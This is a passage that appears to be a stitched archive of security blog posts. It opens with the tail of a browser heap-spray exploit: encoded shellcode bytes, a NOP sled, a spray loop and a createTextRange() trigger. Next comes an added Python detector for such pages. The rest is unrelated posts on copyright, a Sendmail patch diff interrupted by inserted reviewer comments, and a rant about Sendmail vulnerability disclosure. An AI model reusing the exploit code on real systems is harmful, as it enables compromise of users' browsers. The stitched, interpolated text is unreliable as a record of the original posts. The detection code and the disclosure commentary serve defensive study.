%u8300%u09c2%u006a%u006a%u006a%u006a%uff52 %u5ad0%u08e8%u0001%u8900%u0842%u028b%u1bbb %u10c2%u833b%u1ec2%u5052%u04e8%u0001%u5a00 %ueee8%u0000%u8b00%u8bd8%u0842%uc281%u00a8 %u0000%u006a%u0068%u0000%u6a80%u6a00%u5200 %uff50%u5ad3%ucee8%u0000%u8900%u0842%u028b %u1bbb%u10c2%u833b%u2fc2%u5052%ucae8%u0000 %u8b00%u5af0%ub2e8%u0000%u8b00%u087a%uca8b %uc183%u5a0c%u5256%u5151%ue868%u0003%u5200 %uff57%u59d6%uc00b%u0774%u3983%u7500%ueb02 %u5a2a%u5251%ue852%u0087%u0000%uda8b%uc383 %u5e0c%u006a%u8b53%u0442%u4a8b%u510c%u5056 %u4fbb%u6a47%ue807%u007b%u0000%u595a%ueb5e %u5abd%ue85e%u005f%u0000%u428b%ubb04%uc776 %ued00%ue850%u0061%u0000%ubb5a%u4179%u88e7 %u6852%u0200%u0000%u50e8%u0000%u5f00%uf78b 
%uf803%uc681%u03e8%u0000%u09b9%u0000%uf200 %u5aa4%uc033%uf28b%uc681%u0491%u0000%ufe8b %uc783%uc710%u1047%u0044%u0000%u21bb%u05d0 %u57d0%u5056%u6a50%u5020%u5050%u5250%u12e8 %u0000%u6100%u81c3%ue8c2%u0003%u8300%u09c2 %uc283%u8334%u0cc2%u53c3%u5756%u458b%u8b3c %u0554%u0378%u52d5%u528b%u0320%u33d5%u33c0 %u41c9%u348b%u038a%u33f5%uc1ff%u13cf%u03ac%u85f8 %u75c0%u3bf6%u75fb%u5aea%u5a8b%u0324%u66dd %u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5fc5 %u5b5e%ue0ff”);

bigblock = unescape(“%u9090%u9090″);
slackspace = 20 + shellcode.length

while (bigblock.length < slackspace)
bigblock += bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length + slackspace < 0×40000)
block = block + block + fillblock;

memory = new array();

for ( i = 0; i < 2020; i++ )
memory[i] = block + shellcode;

var r = document.getelementbyid(‘blah’).createtextrange();

</script>
</body></html>
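defenders who need to triage a suspected landing page can flag the structural traits the source above exhibits without executing any of it: a long %uXXXX-escaped payload handed to unescape(), a block made only of %u9090 (nop pairs), a loop that doubles a string up to a large hex-sized target, an array filled with block plus payload, and the createTextRange() trigger. the following python is an added example and not part of the original post or of the exploit above; both sample pages are constructed here, with the payload replaced by a short dummy, and the weights and threshold are my own choices.

```python
"""Static indicators of a browser heap-spray page.

Added example, not part of the original post: scores page source for the
structural traits of a heap spray so a suspected landing page can be triaged
without rendering it. Both samples below are constructed for the demonstration.
"""
import re
from typing import Dict

INDICATORS = {
    # a long run of %uXXXX escapes handed to unescape(): encoded binary payload
    "unicode-escaped-payload": re.compile(r"unescape\(\s*[\"'](?:%u[0-9a-f]{4}\s*){8,}", re.I),
    # a block consisting only of %u9090 (x86 NOP pairs)
    "nop-sled-block": re.compile(r"unescape\(\s*[\"'](?:%u9090)+[\"']", re.I),
    # a while loop that grows a string until it reaches a hex-sized target
    "block-doubling-loop": re.compile(r"while\s*\(.*length.*<.*0x[0-9a-f]{4,}.*\)", re.I),
    # a for loop assigning block + payload into successive array slots
    "spray-array-fill": re.compile(r"for\s*\([^)]*\)\s*\w+\[\w+\]\s*=\s*\w+\s*\+\s*\w+", re.I),
    # the trigger used by the exploit in the post
    "createTextRange-call": re.compile(r"createTextRange\s*\(", re.I),
}
# presence weights (my own choice): payload and NOP block weigh most, the trigger least
WEIGHTS = {
    "unicode-escaped-payload": 3, "nop-sled-block": 3,
    "block-doubling-loop": 2, "spray-array-fill": 2, "createTextRange-call": 1,
}
SUSPECT_THRESHOLD = 6


def scan(html: str) -> Dict[str, int]:
    """Count how often each indicator appears in the page source."""
    return {name: len(pattern.findall(html)) for name, pattern in INDICATORS.items()}


def risk_score(counts: Dict[str, int]) -> int:
    """Presence-based score: each indicator counts once regardless of repeats."""
    return sum(WEIGHTS[name] for name, count in counts.items() if count)


def verdict(html: str) -> str:
    score = risk_score(scan(html))
    if score >= SUSPECT_THRESHOLD:
        return "heap-spray-suspected"
    return "review" if score else "no-indicators"


# Constructed sample: the skeleton of a spray page, payload replaced by a short dummy
SUSPICIOUS_SAMPLE = """<input type="checkbox" id="blah">
<script>
shellcode = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (i = 0; i < 2020; i++) memory[i] = block + shellcode;
var r = document.getElementById('blah').createTextRange();
</script>"""

# Constructed sample: ordinary page script that also builds an array and calls unescape()
BENIGN_SAMPLE = """<script>
var items = [];
for (i = 0; i < 10; i++) items[i] = "row" + i;
var title = unescape("%u0048%u0069");
</script>"""

if __name__ == "__main__":
    for label, page in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        counts = scan(page)
        print(label, counts, risk_score(counts), verdict(page))
```

the scoring is deliberately presence-based: a real page may repeat the spray loop or split the payload across several unescape() calls, and what matters for triage is which traits co-occur, not how often.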

gadi evron,
ge@beyondsecurity.com.

Intellectual Property II

Somebody asked me:

> Rob, Did they give you these policies in advance? Any kind of writer’s
> guidance in advance?

I did, in fact, have the policy in advance, which is another and very
interesting story. This mag is part of a group, and I had previously written an
article for another of their rags. Having written the first article (and, at
the last minute, had to yell and scream when they changed the implication of the
article to the complete opposite of that intended), suddenly I couldn’t get paid
because they didn’t have a “freelance writer’s agreement” with me. So, having
wasted serious time in putting together that first article, I was eager to do
this expeditiously. Maybe they could send me either a softcopy of the
agreement, or a scan, by email? Oh, no! Heaven forfend! They couldn’t make a
softcopy or scan of the agreement: the agreement itself was intellectual
property, and they wouldn’t want any possibility of unauthorized copies floating
around. (This is a mag group on high tech topics and they haven’t heard of
photocopiers?)

Anyway, the agreement is one of the more bizarre and convoluted documents I’ve
ever seen, and contradicts itself on this very point. Page two says (buried in
one paragraph) that the item supplied “has not been previously published”, while
page one says that, if it is, the supplier (that’s me) supplies the item under
the terms in the contract.

However, while I used my own previous writings, the item supplied definitely
hadn’t been published before. I’ve written extensively on the history of
computer viruses, but I’ve never before had to pare the text so sparingly,
wondering, often, if I was misrepresenting the actual situation by having to be
so terse. (But that’s always the case with magazines anyway.)

> If not, do you have a lawyer that you can talk to?

A lawyer? You’ve got to be kidding. That’s one of the major points with this
whole copyright issue, and it is a major factor with the file-sharing/RIAA/MPAA
business as well. Copyright law, and lawsuits, are the province of entities who
can afford lawyers, and writers can’t. Corporations can. So, supposing that
this publishing group decided to take what I submitted to them, not pay me, and
publish the feature anyway, even under somebody else’s name. How much is it
going to cost me to sue them? How much chance do I have of getting them to even
answer the suit? If it did go to court, they’d be able to fill the court with
lawyers: if I *was* able to get anybody to take my case for the pittance I’d be
able to pay, do you truly think that I’d have any chance of winning, even with a
case as clear cut as all that?

I’ve got a lot of experience here, believe me. I’ve had all kinds of people
steal my stuff over the years. Once, somebody took 150 of my reviews, all of
which you have seen marked with the “copyright Robert M. Slade [year]” line, and
published them in his book. I raised that issue with the publisher. I have a
nice letter from a Vice President of John Wiley and Sons, stating that I have no
rights in the matter because, in their considered opinion, anything that appears
on the Internet is completely free of copyright protection. (Someday, when I
get mad enough, I’m going to scan some of Wiley’s books and put them on the net,
along with a copy of that letter.) Most recently, I found that a company had
posted my entire dictionary of security terms on their site. (In that case,
they did apologize and take it down. They had contracted out that part of the
Website, and had no idea that the contractor had delivered stolen goods. I have
no idea what happened to the contractor.) In any case, I can complain, and
sometimes I get an apology, or a request for permission. Never have I gotten
any money. Copyright law just doesn’t work for us producers.

(In related news, Canada recently narrowly missed having an amendment to the
copyright law here, Bill C60. There is an ongoing discussion about it in the
editorial and letters page of the Vancouver Sun. In today’s paper [and in yet
another irony, the Sun won’t let you see that at
http://www.canada.com/vancouversun/news/letters/story.html?id=36792a16-ae29-433d-a89d-988f4fb0d8e3
unless you are a subscriber] someone from UBC is sounding
the “file sharing is theft” mantra. I find this interesting because he talks
about getting royalties for materials he has written. I wrote some stuff for
UBC a while back. When someone signs up for the online course, UBC gets $2,000,
and I get $5.)

(Oh, dear. I used a couple of lines from her message in this one. Now
I’ll have to get her to sign a formal release before I send this. Ooops, too
late. Hit the “publish” button already …)

Hacked #4 (comic strip)

Hacked, fourth strip of this new comic.

Hacked #4

Sendmail Silently-Patched Memory Leak [Deprecated]

Update:
Regarding my blog on the memory leak in Sendmail, I was wrong.
The patch fixes a minor resource-depletion issue and does not appear to have any security consequences.
I apologize for the mistake, and would like to thank Eric Allman from the sendmail team for the correction.

Ido Kanner,
SecuriTeam

Sendmail silently fixed a memory leak in the recent multiple vulnerabilities patch.

The problem occurs when a buffer is set to NULL instead of freeing its memory, causing the data to be marked as being used even though there is no variable that stores the data address.

This happens when the original (buf0) buffer and the buf buffer have different addresses.

The fix was as follows:
In the file: contrib/sendmail/src/conf.c


- if (buf == NULL)
- {
- buf = buf0;
- bufsize = sizeof buf0;
- }
+ buf = buf0;
+ bufsize = sizeof buf0;

for (;;)
{
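Review bot: making `buf = buf0;` and `bufsize = sizeof buf0;` unconditional is only safe if `buf` can no longer hold a value on entry: the removed `if (buf == NULL)` guard existed precisely because it could, so unless the declaration of `buf` changes in the same patch, a heap buffer left in `buf` by an earlier call is overwritten here without being freed. Please confirm the declaration change is part of this patch or note it in the commit description.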
@@ -5281,8 +5278,8 @@
(void) sm_io_fprintf(smioerr, SM_TIME_DEFAULT,
"%s: %s\n", id, newstring);
#endif /* LOG */
- if (buf == buf0)
- buf = NULL;
+ if (buf != buf0)
+ sm_free(buf);
errno = save_errno;
return;
}
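Review bot: `if (buf != buf0) sm_free(buf);` releases the heap buffer on this `return;` path, but this is only one exit from the surrounding `for (;;)` loop; every other exit needs the same `sm_free` or the leak this hunk closes is simply moved elsewhere. A one-line comment stating that `buf0` lives on the stack and must never reach `sm_free` would help the next reader understand why the comparison is there.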

This advisory can be found here: http://www.securiteam.com/unixfocus/5SP0M0UI0G.html


Trusting SMTP (more on SenderGate: SMTP Multiple Vulnerabilities)

oh, sorry for not mentioning earlier -
operators that want to patch sendmail, i’d suggest doing it soon. now we face risk not only to our own mail servers, but also from trusting other servers.

this may sound like a joke, as smtp is an untrusted service with no trust built
into it, but servers that employ different trust models can potentially be
compromised now.

gadi evron,
ge@beyondsecurity.com.


SendGate (Sendmail vulnerabilities data)

tech details:
sendmail vulnerabilities were released yesterday. no real public announcements to speak of to the security community.

securiteam released some data:
“improper timeout calculation, usage of memory jumps and integer overflows allow attackers to perform a race condition dos on sendmail, and may also execute arbitrary code.”
more here: http://www.securiteam.com/unixfocus/5rp0l0ui0s.html

iss only reported the race condition (dos?). the sendmail advisory reported the race condition dos, the memory jumps and a “theoretical” integer overflow.

to begin with, has anyone noticed the memory leak they (sendmail) silently patched? i wonder how many other unreported, silently-patched vulnerabilities are out there?

second, the integer overflow is practical, not theoretical.

iss reported the race condition last month. there is no data available on when the other vulnerabilities were discovered. any guesses?

they also patched many non-security related bugs, added checks and more informative error messages, etc.

sendmail is, as we know, the most used daemon for smtp in the world. this is an international infrastructure vulnerability and should have been treated that way. it wasn’t. it was handled not only poorly, but irresponsibly.

here’s what iss, who released the race condition vulnerability, has to say:
http://xforce.iss.net/xforce/alerts/id/216
they say it’s remote code execution. they say it’s a race condition. no real data available to speak of. i can’t see how it’s remotely exploitable, but well, no details, remember? from what we can see it seems like a dos.

bottom line:
what they did behind the smoke-screen is replace a lot of setjmp() and longjmp() calls (not very secure ones at that) with goto’s (interesting choice).
they changed the logic of the code and replaced everything that calculated timeouts. functions that calculated something and previously returned void now return a boolean result; callers used to look at the content rather than at success.

the int overflow is possibly exploitable, not very sure about the jumps. no idea why iss says the race condition is, would love insight.

public announcement:
freebsd were the only ones who released a public announcement of a patch and emailed it to bugtraq so far.

the patches:
the freebsd patch much like the sendmail.org patch is very long, complicated and obscure. the release was made along with a ton of other patches for freebsd. go figure what’s in there.

sendmail.com’s patch is so big they may as well have re-released the whole program.

there are also patches available for other *nix systems, no distributions released updates yet.

sendmail’s announcement:
obscure. not worth any other comments other than the ones above.

cve information:
cve-2006-0058 (reserved)

commentary:
one could say iss and sendmail did good, obscuring the information so that the vulnerability-to-exploit time will be longer. that proved wrong, useless and pointless. they failed.

after looking at the available data for 30 minutes (more or less), we know exactly what the vulnerabilities are. exploiting them may not be that trivial if indeed possible, but there are most likely already exploits out there if it is. when will the first public poc be released? your guess is as good as mine.
not to mention the silently patched memory leak.

smtp, and sendmail by extension, are critical for the internet as an international infrastructure. if this ends up being exploitable (no details, remember?) both iss and sendmail should look long and hard at the coming massive exploitation of sendmail servers.

with issues relating to the internet infrastructure i’d be willing to go even with the evil of non-disclosure, as long as something gets done and it is then reported publicly once it has finally wound down after a couple of years.
if not, and you are going to make it public, make the effort and fix it as soon as you can, and give out information to help the process of healing. don’t do it a month late and obscure the data.

it took sendmail a month to fix this. a month.

a month!

with such vendor responsibility, perhaps it is indeed a good thing to go full disclosure. it seems like history is repeating itself and full disclosure is once again not only a choice, but necessary to make vendors become responsible.

i wish we could somehow avoid all the guys who will inevitably shout in the press “end of the world”. the internet is, was and will stay havoc. there will be exploitation. those who care about security will be patched, those that don’t will hopefully finally learn a lesson. the internet won’t die because of this, although email may suffer – but we are used to that by now, even when losing money.

i am so very angry the details are obscure and hidden in the way they are, especially as that is useless in this case. why did they do it, to claim they are “responsible”? too late.

“the avalanche has already started. it is too late for the pebbles to vote.” – kosh, babylon 5.

how are they to show open source is reliable if this is how they act? they hurt the cause. if they don’t know how to handle something like this, they should ask for help.

what, if it’s not reported to microsoft, there is no reason to be “responsible”?

it’s like annoying “fake porn” on tv. either show the nudity and rate the program accordingly or stay suitable for normal viewing. there is no eating the cake and leaving it whole.

“hey mom, what’s my root password? i forgot”
“dunno, just use the new sendmail vulnerability!”

they should learn from apache. with such a critical vulnerability i know the apache guys would not have slept until it is patched!

special thanks go to ido kanner for all his help.

we will update on the situation if required on http://blogs.securiteam.com

this text can be found here: http://blogs.securiteam.com/index.php/archives/363

gadi evron,
ge@beyondsecurity.com.


Copyright Gone Mad

copyright Robert M. Slade, 2006
(with that little (c) symbol thrown in for good measure)

I got asked to do a 20 year retrospective on computer viruses for a
tech magazine. (The Brain virus is thought to have been released in
1986: there is a string of “(c)1986Brain” in the body of the virus
that is presumably a copyright notice, which is highly ironic for a
number of reasons.) There were a few oddities about the request, such
as a demand for graphics. I normally don’t do graphics, but I had
such a fun time doing the article that I gave in, and finally put
together quite a piece, I thought. It was a gas going back over all
the stuff I’ve seen over the years.

You may never see it.

See, I got this phone call from the magazine today. It seems that
some of the wording in my article bears a striking resemblance to a
site on the Internet: “Robert Slade’s Computer Virus History” at

http://www.cknow.com/vtutor/RobertSladesComputerVirus.html.

This is surprising?

I’ve been writing articles, series, and books about viruses since the
darn things started. As a matter of fact, it’s a bit surprising that
they didn’t find more sites with my stuff on it, especially since
there have been dozens of examples that I’ve seen myself, over the
years, where people have used my material and passed it off as their
own.

But it seems that this outfit has a policy where they won’t publish
anything that has already appeared on the net.

I suppose that’s fair enough. Everybody is getting really antsy about
copyright violations these days, and, as somebody who does an awful
lot of writing, I suppose I should approve.

Except I don’t. The crackdown (and crankdown) on copyright and
copying is making it hard for a lot of us who are relying on our own
research and writing. After all, who else am I going to use for
material on virus history? Oh, lots of people were there, but who
else wrote it down? I do go back (and did go back, for this article)
and check on specifics, and even made corrections on items we’ve found
out more about. But, by and large, if I want to generate a decent
timeline of what happened, I have to rely very heavily on my own
stuff.

Except, now I can’t.

Well, like I said, you may not get to see the history article. Or, if
they are willing to bend their policy a bit, you might. But I’m
willing to bet that their policy is more important to them. After
all, they can always get another writer to do it for them.

Of course, in all probability he won’t know anything about the history
of viruses.

Or, he can read my stuff. And reuse it.

copyright Robert M. Slade, 2006
(with that little (c) symbol thrown in for good measure)
